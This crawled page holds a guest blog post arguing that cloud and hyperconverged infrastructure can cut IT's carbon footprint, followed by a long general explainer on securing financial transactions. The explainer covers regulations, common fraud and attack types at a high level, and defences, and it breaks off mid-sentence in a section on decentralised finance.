CC-MAIN-2024-38
https://kerisys.com/resources/what-is-anti-passback/
2024-09-14T14:17:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00612.warc.gz
en
0.943355
1,086
2.546875
3
This is a guest post by Han Chon, managing director for ASEAN at Nutanix There has been much discussion around how technology can be used to accelerate sustainability efforts, from green IT to automated and digitised systems, and the integration of new data sets in emissions reduction. What is often overlooked, however, is the fact that many of these technologies, and the energy and infrastructure they require, can actually expand a company’s carbon footprint rather than reduce it. This begs the question: Is technology hindering climate change more than it is helping it? Across the Asia-Pacific, there is a stronger impetus than ever for companies to ‘go green’ and embrace sustainability across their organisations. Many markets across the region now require publicly listed companies to disclose climate reporting, and there is increased investor scrutiny around companies’ environmental, social and governance (ESG) commitments. However, the pitfall that many businesses have fallen into is to hop on the green bandwagon, simply to tick a corporate social responsibility checkbox — without meaningfully engaging with how sustainability can be integrated in their organisation’s operations, processes, and overall DNA. The IT industry is no exception. Having waxed lyrical about the positive impact that technology can have in accelerating climate change efforts and preventing the emission of more than one billion metric tons of carbon dioxide (CO2), technology companies have done little to address these challenges. The sector’s notoriously resource-intensive nature, particularly where chip-making and datacentres are concerned, continues to be a cause of concern, as well. Currently, the information and computing technology sector is expected to account for nearly 20% of global energy demand by 2030, up from 3% today. The truth is that while our need to reduce emissions has never been greater, our need for energy has never been higher either. With the digital economy at an all-time boom, and every business now seeking to become a digital enterprise, there is simply no escaping our increasing need for more computing power. This demand is only expected to rise in the years ahead, hastened by rapid digitalisation and wider adoption of technologies like 5G, artificial intelligence, the internet of things, and blockchain. So, if there is no wriggling out of technology’s all-encompassing grasp, how can we find a more sustainable way around the issue? The way forward could be to adopt a more holistic approach that prioritises both technology and sustainability considerations, without compromising the business bottom line. Most industry conversations thus far have focused, and perhaps disproportionately so, on the exhaustive environmental impact of data centres. But recent studies have indicated that newer datacentres, developed with sustainable technologies and fuelled by renewable energy sources, can reduce overall rates of energy consumption and emissions without sacrificing the need for increased computing capacity. These newer datacentres can deliver six times more computing output, while consuming energy at a marginal increase of 6%. Major cloud computing players like Amazon Web Services (AWS) and Microsoft have already been fast adopters, while others like Google Cloud are launching solutions that provide businesses with data-driven insight into their carbon footprint, alongside recommendations and deployable tools to reduce their carbon emissions. Leaving legacy behind However, datacentres present just one part of the equation. As technologies evolve and more businesses pivot to hybrid and multicloud models to meet their increasing need for operational agility, many are grappling with the complexities and fallout of managing various cloud architectures across multiple platforms, which often comprise siloed, legacy components. This is troubling for several reasons. Traditional IT infrastructure is composed of three primary layers — server, storage, and network — which are energy-intensive operations that require a significant amount of hardware and cooling to maintain. The hefty environmental footprint that many legacy IT systems create has earned them the notorious label of ‘gas guzzlers’ in the industry, making them increasingly costly and laborious to upkeep as well. At the same time, these legacy systems often no longer serve the needs of companies as they look to scale their operational agility, reduce total cost of ownership, and increase returns on their technology investments. Modern IT environments, such as those powered by hyperconverged infrastructure (HCI), collapse traditional three-tier setups into a single, consolidated layer within an organisation’s technology stack. This simplifies and streamlines organisations’ journeys to the cloud, and enables them to tap on public, private and hybrid cloud services more easily. At the same time, it significantly reduces the energy and hardware required to run traditional datacentres, directly lowering businesses’ energy consumption, carbon emissions, and operating costs. For instance, Indonesia’s Bank BPD Bali successfully leveraged cloud to drive increased IT efficiency — which meant it could significantly reduce its datacentre footprint by approximately 70%, reduce utilities needed for power and cooling, and even gain operational cost savings of up to 80%. Similarly, Australian manufacturer Nature’s Organics overhauled its energy-hungry and power-lacking IT infrastructure to better manage resource and energy consumption and drive greater efficiencies across its eco-friendly manufacturing operations. In doing so, the company was able to reduce its IT-related energy consumption and environmental footprint by approximately 55%. Technology and sustainability: Working in tandem While there is no denying that today’s technologies demand greater computing power and energy than before, they could also be one of the greatest forces for good in the fight against climate change. In fact, cloud has already proven instrumental in enabling companies to track and reduce their carbon emissions and footprint, and run their operations sustainably and efficiently, with a significant benefit to the business bottom line — a triple win for businesses, with neither the enterprise nor environment sacrificed. So, is technology more a hindrance or help to the climate movement? Evidence suggests that the latter leans true. But it all hinges on whether businesses continue to leverage IT innovatively, and responsibly. However, one thing is for sure: the world would be nowhere closer to meeting its sustainability targets if we did not harness the power of technology.
<urn:uuid:6200f5b0-f56c-4247-91e8-96a9e05fc808>
CC-MAIN-2024-38
https://www.computerweekly.com/blog/Eyes-on-APAC/IT-and-sustainability-The-21st-century-paradox
2024-09-14T14:13:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00612.warc.gz
en
0.952345
1,247
2.671875
3
In today's world, where almost every single transaction we make happens online, keeping our financial data secure has never been more important. Imagine paying for your morning coffee with a tap on your phone, transferring money to a friend with a quick swipe, or making a large business deal without ever stepping into a bank. Yes, we know - these conveniences are fantastic, but they also open up new avenues for cybercriminals looking to exploit vulnerabilities. This case study dives deep into the essentials of financial transaction security. We'll walk through the various threats lurking in the digital shadows, the regulations in place to protect us, and the best practices that organizations need to adopt to stay safe. A short overview of financial transactions As you already know, financial transactions involve the transfer of money or assets between parties. These transactions form the backbone of the global economy, enabling commerce and trade across various sectors. Financial transactions can be broadly categorized into: Retail transactions are at the heart of everyday consumer activities. They encompass a wide range of purchases and payments made by individuals for goods and services. Key examples include: Credit/Debit card payments: One of the most common methods, where consumers use their credit or debit cards to make purchases in physical stores or online. The convenience and widespread acceptance of these cards make them a staple in retail transactions. Mobile payments: With the rise of smartphones, mobile payment solutions like Apple Pay, Google Wallet, and Samsung Pay have become increasingly popular. These methods allow consumers to make payments quickly and securely using their mobile devices, often with just a tap or a scan - simple as that. Online banking: Most people these days manage their finances and make transactions through online banking platforms. These platforms offer services like bill payments, fund transfers, and account management, providing a seamless and accessible way to handle personal finances from anywhere with an internet connection. Corporate transactions are essential for the smooth operation of businesses. They involve larger sums of money and often require more complex security measures to ensure their integrity. Examples of corporate transactions include: B2B payments: Business-to-business payments are transactions between companies. They can include payments for goods and services, contractor payments, and other business-related expenses. They usually involve large sums and require secure, efficient payment processing systems. Wire transfers: Used for transferring funds electronically between banks, wire transfers are a staple for corporate transactions. They are particularly useful for high-value transfers, both domestically and internationally. Ensuring the security of these transfers is crucial to prevent fraud and unauthorized access. Payroll disbursements: Companies need to pay their employees regularly, and payroll disbursements are the transactions that handle these payments. These can be executed through direct deposits into employee bank accounts or through payroll cards. Remember, ensuring the accuracy and security of payroll transactions is vital for maintaining employee trust and satisfaction. The last type involves the buying and selling of financial assets. These transactions are crucial for individual investors and institutions looking to grow their wealth. Examples include: Stock trades: Buying and selling shares of companies on stock exchanges. Investors and traders participate in stock markets to gain returns on their investments. The security of trading platforms and the protection of investor data are critical to prevent market manipulation and fraud. Bond purchases: Investing in bonds issued by governments or corporations. Bonds are considered safer investments compared to stocks, but they still require secure platforms to manage the transactions and protect investor interests. Cryptocurrency exchanges: The rise of digital currencies like Bitcoin, Ethereum, and others has introduced a new dimension to investment transactions. Cryptocurrency exchanges facilitate the buying, selling, and trading of these digital assets. Given the decentralized and often unregulated nature of cryptocurrencies, ensuring the security of exchanges is paramount to protect investors from hacking and fraud. Each of these transaction types has its own set of security challenges and requirements. Understanding these nuances is essential for developing robust security measures that protect all parties involved in financial transactions. Digital transformation and the impact it made on financial institutions The digital transformation has revolutionized the financial sector, shifting from traditional banking and cash transactions to digital platforms. This evolution has brought unprecedented convenience and accessibility to financial services, but it has also introduced new security challenges. As more people and businesses embrace digital financial tools, the need for strong and reliable security measures becomes ever more critical. Mobile banking apps Mobile banking apps have transformed the way people manage their finances. These apps allow users to perform a wide range of banking operations from the convenience of their smartphones. Key features include: Account management: Users can check their account balances, review transaction histories, and manage multiple accounts with just a few taps on their mobile devices. This real-time access to financial information improves user control over personal finances. Fund transfers: As you already know, mobile banking apps enable quick and easy transfers between accounts, whether within the same bank or to external accounts. Features like Zelle or other peer-to-peer payment systems integrated within banking apps make sending money to friends, family, or businesses instantaneous. Bill payments: This one lets people schedule and pay bills directly through their mobile banking apps, eliminating the need for paper checks or manual payments. Automatic payment setups ensure that bills are paid on time, helping to avoid late fees and maintain good credit standing. Mobile deposits: Many banking apps offer the convenience of mobile check deposits, where users can simply take a photo of a check with their phone’s camera to deposit it into their account. This feature saves time and provides flexibility for users who may not have easy access to a bank branch. Mobile banking apps revolutionize financial management by providing real-time access to accounts, quick fund transfers, seamless bill payments, and convenient mobile check deposits. Although enhanced security measures protect users, it’s essential to remain vigilant and practice safe usage to fully benefit from these advancements. E-commerce platforms have revolutionized retail, allowing consumers to shop for products and services from the comfort of their homes. These platforms facilitate online shopping and digital payments, driving the growth of the digital economy. Let's check their key aspects: Online marketplaces: Platforms like Amazon, eBay, and Alibaba connect buyers and sellers from around the world. These marketplaces offer a wide range of products, competitive pricing, and user reviews, making online shopping an attractive option for consumers. Payment gateways: Secure payment gateways are essential for processing online transactions. Companies like PayPal, Stripe, and Square provide payment processing services that encrypt sensitive information, reducing the risk of data breaches and fraud. Digital carts and checkout processes: E-commerce platforms streamline the shopping experience with digital carts and seamless checkout processes. Features like saved payment information, one-click purchases, and guest checkouts enhance user convenience and encourage repeat business. Security measures: To ensure the security of online transactions, e-commerce platforms implement various security measures such as SSL/TLS encryption, two-factor authentication, and fraud detection systems. These measures help protect consumer data and build trust in online shopping. The rise of e-commerce has expanded the digital economy, creating new opportunities for businesses and consumers alike. However, it also necessitates stringent security protocols to protect against cyber threats such as phishing, identity theft, and payment fraud. Digital wallets, also known as e-wallets, have become a popular method for storing payment information securely and making quick transactions. These wallets offer several advantages, including: Convenience: Digital wallets like Apple Pay, Google Wallet, and Samsung Pay allow people to store their credit and debit card information securely on their mobile devices. This eliminates the need to carry physical cards and makes transactions faster and more convenient. Contactless payments: Digital wallets enable contactless payments, where users can simply tap their phone or smartwatch on a payment terminal to complete a transaction. This feature has gained popularity, especially in the wake of the COVID-19 pandemic, as it reduces physical contact and enhances hygiene. Integration with other services: Digital wallets often integrate with other financial services, such as loyalty programs, gift cards, and transit passes. This integration provides a seamless user experience and adds value to the digital wallet ecosystem. Enhanced security: These wallets also employ various security measures to protect user information. These include tokenization, where actual card numbers are replaced with unique tokens during transactions, and biometric authentication, such as fingerprint or facial recognition, to authorize payments. The adoption of digital wallets is on the rise, driven by their convenience and enhanced security features. However, as with any digital technology, there are security risks to consider. Ensuring the security of digital wallets involves implementing multi-layer encryption, regular software updates, and educating users about potential threats. What else has happened with this shift? Moving to digital platforms has fundamentally changed the landscape of financial transactions. While digital transformation brings many convenient benefits, it also introduces new security challenges. Organizations must stay vigilant and adopt comprehensive security measures to protect against evolving threats. Key considerations include: Educating consumers and employees about cybersecurity practices is essential for preventing security breaches. This includes recognizing phishing attempts, using strong passwords, and regularly updating software. Adhering to regulations such as PCI DSS, GDPR, and other industry standards is critical for maintaining the security and integrity of financial transactions. Compliance helps protect sensitive information and avoid legal and financial penalties. Continuous monitoring and improvement Implementing continuous monitoring systems to detect and respond to security threats in real time is one of the most important things. Organizations should also regularly review and update their security policies and procedures to stay ahead of emerging threats. As you can see, as more transactions occur online, the potential attack surface for cybercriminals expands significantly. Cybercriminals are constantly evolving their tactics to exploit vulnerabilities in digital financial systems. Increased attack vectors The shift to digital platforms opens numerous attack vectors. Cybercriminals can target mobile banking apps, e-commerce sites, digital wallets, and online banking platforms through various methods such as malware, phishing, and man-in-the-middle attacks. Each of these entry points requires stringent security protocols to safeguard against breaches. The sophistication of cyber attacks Cyber attacks are becoming more sophisticated, with attackers using advanced techniques like AI-driven malware, ransomware, and social engineering. These attacks can bypass traditional security measures, making it imperative for financial institutions to adopt proven security solutions, such as machine learning-based threat detection and behavior analytics. Volume of transactions The sheer volume of digital transactions increases the likelihood of potential security breaches. Financial institutions must ensure that their systems can handle high transaction volumes without compromising security. This involves implementing scalable security solutions that can protect against both common and sophisticated threats. Regulatory bodies are continually updating compliance requirements to address emerging security challenges. Financial institutions must stay abreast of these changes and ensure compliance with standards such as PCI DSS, GDPR, and other regional regulations. Non-compliance can result in severe penalties and damage to an institution's reputation. Trust is a cornerstone of the financial industry. Any breach or compromise of financial transactions can erode consumer trust, leading to a loss of customers and potential financial repercussions. Institutions must prioritize transparency and communication with consumers, ensuring that their financial data is secure. Ensuring the resilience of financial operations in the face of cyber threats is critical. Financial institutions must develop and implement comprehensive incident response plans to quickly identify, contain, and remediate security breaches. Regular testing and updating of these plans are essential to adapt to the evolving threat landscape. Importance of securing financial transactions - Protecting consumer data Consumer data protection is critical for maintaining trust and compliance with regulatory requirements. Financial institutions must adopt a holistic approach to data protection that encompasses various key aspects: Ensuring personal information remains confidential is paramount. Financial institutions must implement encryption protocols to protect data both in transit and at rest. Encryption ensures that even if data is intercepted, it cannot be read by unauthorized parties. Additionally, access controls and authentication mechanisms must be in place to restrict access to sensitive data. Protecting data from unauthorized alterations is another important thing for maintaining the accuracy and reliability of financial information. This involves implementing checks and balances to detect and prevent any unauthorized changes to data. Financial institutions should use cryptographic hashing to verify the integrity of data and employ audit trails to track and monitor any changes. Guaranteeing that financial services are accessible when needed is crucial for operational efficiency and customer satisfaction. Financial institutions must ensure their systems are robust and resilient to withstand cyber attacks and other disruptions. This includes implementing redundancy measures, regular backups, and disaster recovery plans to minimize downtime and ensure continuous availability of services. Preventing financial fraud Fraud prevention is a crucial aspect of financial transaction security. Financial fraud can take many forms, and preventing it requires a multi-faceted approach: Identity theft: Using someone else’s personal information for fraudulent activities can have devastating consequences for victims. Financial institutions must implement strong identity verification processes to prevent identity theft. This includes using multi-factor authentication (MFA), biometric verification, and secure onboarding processes to verify the identities of new customers. Phishing: Deceptive emails or messages aimed at stealing sensitive information are a common tactic used by cybercriminals. Financial institutions must educate their customers about the dangers of phishing and how to recognize suspicious communications. Implementing email security solutions, such as SPF, DKIM, and DMARC, can help protect against phishing attacks by verifying the authenticity of emails. Card skimming: Illegally capturing card information during transactions can lead to significant financial losses for both consumers and businesses. Financial institutions must ensure that point-of-sale (POS) systems and ATMs are secure and regularly inspected for skimming devices. Using chip-enabled cards (EMV) and contactless payment methods can also help reduce the risk of card skimming. Transaction monitoring: Implementing real-time transaction monitoring systems is vital for detecting and preventing fraudulent activities. Financial institutions should use machine learning algorithms and behavior analytics to identify unusual patterns and flag potentially fraudulent transactions. Promptly investigating and responding to these alerts can prevent fraud and minimize losses. User education and awareness: Educating users about common fraud tactics and best practices for protecting their financial information is the first line of defense. Financial institutions should conduct regular awareness campaigns, provide resources on identifying and avoiding fraud, and encourage users to report any suspicious activities immediately. By addressing these aspects, financial institutions can create a nice, solid security framework that protects consumer data and prevents financial fraud. Regulatory and compliance requirements you should know about The security of financial transactions is governed by several stringent regulations designed to protect consumer data and ensure the integrity of financial systems. Compliance with these regulations is essential for financial institutions and businesses that handle sensitive financial information. Here are some of the key regulations: PCI DSS (Payment Card Industry Data Security Standard) PCI DSS is a set of security standards designed to ensure that all companies that accept, process, store, or transmit credit card information maintain a secure environment. Key requirements include: Building and maintaining a secure network: This involves installing and maintaining a firewall configuration to protect cardholder data, as well as using strong access control measures to restrict access to data on a need-to-know basis. Protecting cardholder data: This one includes encrypting the transmission of cardholder data across open, public networks and ensuring that stored cardholder data is protected using strong encryption methods. Maintaining a vulnerability management program: Here, we are talking about using and regularly updating anti-virus software, as well as developing and maintaining secure systems and applications. Implementing strong access control measures: The next one is assigning a unique ID to each person with computer access to ensure accountability and restrict physical access to cardholder data. Regularly monitoring and testing networks: This involves tracking and monitoring all access to network resources and cardholder data, as well as regularly testing security systems and processes. Maintaining an information security policy: The last one is maintaining a policy that addresses information security for all personnel. GDPR (General Data Protection Regulation) GDPR is a comprehensive data protection law in the European Union that mandates strict data protection and privacy measures for organizations handling the personal data of EU residents. Key aspects include: Data protection principles: Organizations must process personal data lawfully, fairly, and transparently. Data must be collected for specified, explicit, and legitimate purposes and should be limited to what is necessary for those purposes. Rights of data subjects: GDPR grants individuals various rights, including the right to access their data, the right to rectification, the right to erasure (right to be forgotten), and the right to data portability. Data security: Organizations must implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk, including encryption and pseudonymization of personal data. Data breach notification: Organizations must report data breaches to the relevant supervisory authority within 72 hours of becoming aware of the breach and inform affected individuals without undue delay if the breach is likely to result in a high risk to their rights and freedoms. Data protection impact assessments (DPIAs): Organizations must conduct DPIAs for processing activities that are likely to result in high risk to the rights and freedoms of individuals to identify and mitigate potential risks. SOX (Sarbanes-Oxley Act) SOX is a U.S. federal law that sets requirements for financial reporting and internal controls to protect investors from fraudulent financial reporting by corporations. Key requirements include: Internal controls: Organizations must establish and maintain an adequate internal control structure and procedures for financial reporting. This involves regular evaluation and documentation of internal controls to ensure the accuracy and reliability of financial statements. Financial disclosures: Senior executives must certify the accuracy and completeness of financial reports and any material changes to financial conditions or operations must be disclosed in a timely manner. Audit requirements: Organizations must engage independent external auditors to review and attest to the effectiveness of internal controls over financial reporting. Audit committees must be independent and oversee the audit process. Record retention: Organizations must retain records and documents that are relevant to financial reporting and audits for a specified period. Destruction or alteration of documents to impede investigations or audits is prohibited. Cybersecurity is no joke: Ransomware attacks are on the rise, targeting businesses across the world. Compliance with these regulations is not just a legal obligation but also a critical component of a robust security strategy. Here’s how these regulations impact security strategies: Risk mitigation: Adhering to regulatory requirements helps organizations identify and mitigate risks associated with financial transactions. By implementing prescribed security controls, organizations can reduce the likelihood of data breaches and fraud, thereby protecting sensitive financial information. Enhanced security posture: Compliance with regulations like PCI DSS, GDPR, and SOX requires organizations to adopt best practices in data protection and security. This leads to the development of a strong security posture, with comprehensive policies, procedures, and technical controls in place to safeguard financial data. Consumer trust and confidence: Regulatory compliance demonstrates an organization’s commitment to protecting customer data and maintaining the integrity of financial transactions. This fosters trust and confidence among consumers, who are more likely to engage with businesses that prioritize data security. Legal and financial consequences: Non-compliance with regulations can result in severe penalties, including hefty fines, legal actions, and reputational damage. For example, GDPR violations can lead to fines of up to 4% of annual global turnover or €20 million, whichever is higher. Similarly, non-compliance with PCI DSS can result in fines, increased transaction fees, and loss of the ability to process credit card payments. Ensuring compliance helps organizations avoid these negative consequences. Continuous improvement: Regulatory requirements often mandate regular reviews, audits, and updates to security practices. This drives organizations to continuously assess and improve their security measures, keeping them up-to-date with evolving threats and technologies. Regular compliance audits also provide valuable insights into potential security gaps and areas for enhancement. Cross-border considerations: For organizations operating internationally, compliance with regulations like GDPR is essential for conducting business in different regions. Ensuring compliance with various regional regulations helps organizations expand their global reach while maintaining consistent security standards across jurisdictions. Common hacking techniques in 2024 As technology advances, so do the methods employed by cybercriminals to exploit vulnerabilities in financial systems, personal data, and organizational infrastructures. In 2024, the landscape of cyber threats is more complex and sophisticated than ever before, driven by the proliferation of digital transformation and the increasing interconnectedness of devices and services. Phishing and social engineering Phishing and social engineering attacks are among the most prevalent threats to financial transactions. Cybercriminals use various techniques to trick individuals into revealing sensitive information such as passwords, credit card numbers, and personal identification information. Unlike regular phishing, which casts a wide net, spear phishing targets specific individuals or organizations. Attackers often gather detailed information about their targets to craft highly personalized and convincing emails. These emails may appear to come from a trusted source, such as a colleague, bank, or service provider, making them more difficult to detect. Once the victim clicks on a malicious link or attachment, their credentials or personal information can be harvested. Voice phishing, or vishing, involves using phone calls to deceive individuals into revealing personal or financial information. Attackers might pose as representatives from banks, credit card companies, or government agencies. They often create a sense of urgency or fear to prompt immediate action, such as claiming that the victim's account has been compromised and requesting verification of personal details. This technique uses enticing offers or promises to lure victims into providing personal information. Baiting can occur online, through pop-up ads or malicious websites offering free downloads, or offline, through physical media like infected USB drives left in public places. Once the victim takes the bait, malware may be installed on their device, or they may be directed to a fraudulent site where their information is collected. Malware and ransomware Malware and ransomware attacks pose significant threats to financial systems, often resulting in substantial financial and reputational damage. Various types of malware, such as keyloggers, spyware, and Trojans, are used to extract sensitive information from infected systems. For example, keyloggers record keystrokes to capture login credentials, while spyware monitors user activity and collects data without their knowledge. Once the data is stolen, it can be sold on the dark web or used for further fraudulent activities. Ransomware encrypts the victim's data, rendering it inaccessible until a ransom is paid to the attacker. Financial institutions are particularly vulnerable to ransomware due to the critical nature of their data. Attackers often demand payment in cryptocurrencies to remain anonymous. Even if the ransom is paid, there is no guarantee that the data will be decrypted, and the organization may still suffer downtime, loss of data, and reputational damage. Man-in-the-middle (MitM) attacks occur when an attacker intercepts and potentially alters the communication between two parties. This can compromise the integrity and confidentiality of financial transactions. In an eavesdropping MitM attack, the attacker listens in on the communication between two parties. This can occur over unsecured Wi-Fi networks, where attackers use tools to capture data packets transmitted between devices. Sensitive information such as login credentials and account details can be intercepted and used for fraudulent activities. In a session hijacking attack, the attacker takes control of a user's session with a financial service or website. This is often done by stealing session cookies that store authentication information. Once the attacker has control, they can perform unauthorized transactions, change account settings, or steal additional information. Attackers can alter the data being transmitted between two parties. For instance, during a financial transaction, the attacker could modify the transaction details, such as the recipient's account number, resulting in the funds being transferred to the attacker's account instead. Insider threats arise from employees, contractors, or partners who misuse their access to financial systems for malicious purposes. These threats can be particularly difficult to detect and mitigate because the insiders have legitimate access to sensitive information and systems. Insiders may steal sensitive financial information, such as customer data, trade secrets, or proprietary algorithms. This data can be sold to competitors or used for personal gain. Data theft can have severe consequences, including regulatory fines, loss of customer trust, and competitive disadvantages. Insider fraud involves manipulating financial records, creating fake accounts, or processing unauthorized transactions. This type of fraud can go unnoticed for extended periods, especially if the insider has control over the auditing processes. Fraudulent activities can result in significant financial losses and legal repercussions. Insiders with malicious intent may deliberately disrupt operations by damaging systems, deleting critical data, or introducing malware. Sabotage can lead to downtime, loss of productivity, and costly recovery efforts. It can also erode trust among customers and stakeholders if they perceive the organization as unable to secure its operations. To mitigate these threats, financial institutions must implement comprehensive security measures, including: Advanced threat detection: Using machine learning and AI-based solutions to identify and respond to sophisticated threats in real time. Employee training: Regularly educating employees about security best practices, phishing awareness, and the importance of reporting suspicious activities. Access controls: Implementing strict access controls and monitoring to limit access to sensitive information based on the principle of least privilege. Incident response plans: Developing and testing robust incident response plans to quickly contain and remediate security breaches. Regular audits: Conducting regular security audits and assessments to identify vulnerabilities and ensure compliance with regulatory requirements. What else could you do? Securing financial transactions is a multifaceted endeavor that involves implementing a range of best practices to protect sensitive data and prevent fraud. Here’s an in-depth look at essential practices to enhance the security of financial transactions: Authentication and authorization Effective authentication and authorization mechanisms are foundational to securing financial transactions. These practices ensure that only authorized individuals have access to sensitive financial data and systems. Multi-Factor Authentication (MFA): MFA requires users to provide two or more verification factors to gain access to systems or perform transactions. This might include something the user knows (like a password), something the user has (like a smartphone or security token), or something the user is (like biometric data). By combining these factors, MFA adds an extra layer of security that makes it significantly harder for attackers to gain unauthorized access. For example, even if an attacker obtains a user’s password, they would still need the second factor (such as a one-time passcode sent to the user’s phone) to complete the authentication process. Biometric authentication: This method leverages unique biological traits such as fingerprints, facial recognition, or retinal scans to authenticate users. Biometric authentication provides a higher level of security compared to traditional passwords, as biological traits are much harder to replicate or steal. For financial transactions, biometric authentication can be used in conjunction with MFA to enhance security further. Role-Based Access Control (RBAC): RBAC involves assigning permissions based on a user’s role within the organization. This means that employees only have access to the information and systems necessary for their job functions. For example, a customer service representative may have access to customer account information but not to financial transaction records. RBAC helps minimize the risk of unauthorized access and reduces the potential impact of insider threats. Encryption and data protection Encryption is a crucial technology for protecting transaction data both during transmission and when stored. Proper encryption practices ensure that sensitive financial data remains confidential and secure. SSL/TLS: Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS), are protocols used to encrypt data transmitted over the internet. SSL/TLS ensures that data exchanged between users and websites is encrypted, preventing interception and eavesdropping by malicious actors. For financial transactions, SSL/TLS is essential for securing online banking, e-commerce sites, and payment processing systems. End-to-end encryption: This method ensures that data is encrypted from the point of origin to the point of destination, meaning that only the intended recipient can decrypt and access the data. End-to-end encryption is crucial for protecting sensitive information during its entire journey, from the user’s device to the financial institution’s systems. This approach minimizes the risk of data being intercepted or altered during transit. Key management practices: Effective key management is vital for safeguarding encryption keys, which are used to encrypt and decrypt data. Organizations should implement robust key management practices, including secure key storage, regular key rotation, and access controls to ensure that encryption keys are protected from unauthorized access. Additionally, backup and recovery procedures should be in place to handle key loss or corruption. Fraud detection and prevention Implementing advanced fraud detection and prevention technologies helps organizations identify and mitigate fraudulent activities in real-time. Let's see what are the most important fraud detection and prevention methods. Machine learning algorithms: Machine learning algorithms analyze huge volumes of transaction data to identify patterns and anomalies indicative of fraudulent activity. These algorithms can detect unusual behavior that may not be apparent through traditional rule-based systems. For example, machine learning can identify deviations from a user’s normal transaction patterns, such as an unusual spending spree or transactions from unexpected locations. Anomaly detection: Anomaly detection involves monitoring transactions for signs of irregular behavior that could indicate fraud. This can include transactions that deviate from established patterns, such as unusually large transactions or transactions occurring outside of regular business hours. Anomaly detection systems can generate alerts for further investigation, allowing organizations to respond quickly to potential threats. Real-time monitoring systems: Continuous monitoring of transaction data helps organizations detect and respond to threats promptly. Real-time monitoring systems analyze transaction data as it occurs, providing immediate insights into potential fraud or security breaches. This allows for rapid response and mitigation, reducing the impact of fraudulent activities. Secure payment gateways and APIs Payment gateways and APIs play a critical role in processing financial transactions and must be secured to prevent unauthorized access and data breaches. Tokenization: Tokenization replaces sensitive data, such as credit card numbers, with unique identification symbols (tokens) that have no intrinsic value. Tokens are used in place of actual data during transactions, reducing the risk of sensitive information being exposed. Even if a token is intercepted, it cannot be used outside of its intended context, protecting the underlying data from theft. API security best practices: APIs facilitate communication between different systems and applications, and securing them is essential for protecting financial transactions. Best practices for API security include implementing secure coding practices, such as input validation and error handling, conducting regular security testing, and monitoring API traffic for suspicious activity. Additionally, APIs should use authentication and authorization mechanisms to ensure that only authorized users and systems can access them. Incident response and recovery Another important thing when it comes to protecting financial institutions is a robust incident response plan, which is crucial for minimizing the impact of security breaches and ensuring a swift recovery. Preparation: Establishing policies and procedures for responding to security incidents is the first step in effective incident response. This includes defining roles and responsibilities, developing communication plans, and creating a comprehensive incident response strategy. Regularly updating and testing the incident response plan ensures that it remains effective and relevant. Detection and analysis: Identifying and assessing the scope and impact of an incident is critical for an effective response. Organizations should use monitoring tools and techniques to detect anomalies and potential breaches. Once an incident is detected, conducting a thorough analysis helps determine the nature of the threat, the affected systems, and the potential impact on operations. Containment, eradication, and recovery: After identifying the incident, the next steps involve isolating affected systems to prevent further damage, removing the threat, and restoring normal operations. Containment measures might include disconnecting compromised systems from the network, while eradication involves eliminating malware or unauthorized access. Recovery efforts focus on restoring systems and data to their normal state and validating that they are secure. Post-incident review: Analyzing the incident after recovery is essential for improving future response strategies. A post-incident review involves examining the cause of the incident, evaluating the effectiveness of the response, and identifying areas for improvement. Lessons learned from the incident should be used to update security policies, enhance training, and strengthen defenses. User education and awareness: Crucial component in safeguarding your digital world The digital landscape is fraught with real danger, with new and evolving threats lurking behind every single click. Despite enormous advances in technology and security measures, cybercriminals continue to baffle us with their unprecedented levels of sophistication and cleverness. However, there's one crucial element that often goes unnoticed – the human factor. Regular training programs help employees and customers understand security threats and best practices for protecting financial information. Training should cover topics such as recognizing phishing attempts, using strong passwords, and securely handling sensitive data. Interactive and engaging training methods can enhance retention and effectiveness. Security awareness campaigns Ongoing security awareness campaigns can keep security top-of-mind for employees and customers. This might include newsletters, webinars, workshops, and informational materials that highlight current threats and provide practical advice for staying safe. Regular updates and reminders help reinforce security practices and keep users informed about emerging threats. Simulated phishing attacks Conducting simulated phishing attacks helps test and improve users’ ability to recognize and respond to phishing attempts. These exercises provide valuable feedback on the effectiveness of training programs and identify areas where additional education may be needed. Simulated phishing attacks also raise awareness and reinforce the importance of vigilance in protecting financial information. Quantum cryptography: Cybersecurity methods for encrypting and transmitting secure data Quantum cryptography represents a groundbreaking advancement in data security by harnessing the principles of quantum mechanics to create theoretically unbreakable encryption methods. Principles of quantum cryptography Unlike classical cryptography, which relies on mathematical algorithms and computational complexity, quantum cryptography is based on the behavior of quantum particles. One key principle is quantum entanglement, where particles become interconnected and can influence each other instantaneously, regardless of distance. This property is used to create secure communication channels where any eavesdropping attempts are immediately detectable, ensuring the integrity and confidentiality of the data being transmitted. Quantum Key Distribution (QKD) A prominent application of quantum cryptography is Quantum Key Distribution. QKD allows two parties to generate and share encryption keys securely, even in the presence of potential eavesdroppers. The security of QKD is rooted in the fact that any attempt to intercept or measure the quantum particles used in the key distribution process disrupts their state, thus revealing the presence of an attacker. This ensures that the keys used for encrypting and decrypting data are secure from unauthorized access. Implications for financial security As quantum computing advances, it has the potential to break current cryptographic systems that are widely used to protect financial transactions. Quantum cryptography offers a future-proof solution to this challenge by providing a new level of security that is resistant to quantum attacks. Financial institutions and organizations handling sensitive data are actively researching and investing in quantum cryptography to safeguard their information against future threats. AI-driven security solutions and things you need to know Artificial Intelligence (AI) is becoming increasingly integral to enhancing security measures, offering sophisticated tools for predictive analytics and automated threat detection. Predictive analytics: AI-driven predictive analytics uses machine learning algorithms to analyze historical data and identify patterns that may indicate future threats. By analyzing vast amounts of transaction data, AI can predict potential security breaches or fraudulent activities before they occur. This proactive approach allows organizations to address vulnerabilities and mitigate risks before they result in significant damage. Automated threat detection: AI systems can continuously monitor and analyze transaction data in real-time to detect anomalies and potential threats. Machine learning algorithms can identify unusual patterns or behaviors that may indicate fraudulent activities, such as unexpected transactions or deviations from established spending patterns. Automated threat detection systems can generate alerts and initiate response actions without human intervention, improving the speed and accuracy of threat responses. Behavioral biometrics: AI can also enhance security through behavioral biometrics, which analyzes patterns in user behavior, such as typing speed, mouse movements, and navigation habits. By creating unique behavioral profiles for users, AI systems can detect deviations that may indicate fraudulent activity or account takeovers. This adds an additional layer of security beyond traditional authentication methods. Decentralized Finance (DeFi) security The rise of Decentralized Finance (DeFi) introduces new security challenges and opportunities as financial transactions move from traditional, centralized systems to decentralized platforms. Smart contract security: DeFi platforms often rely on smart 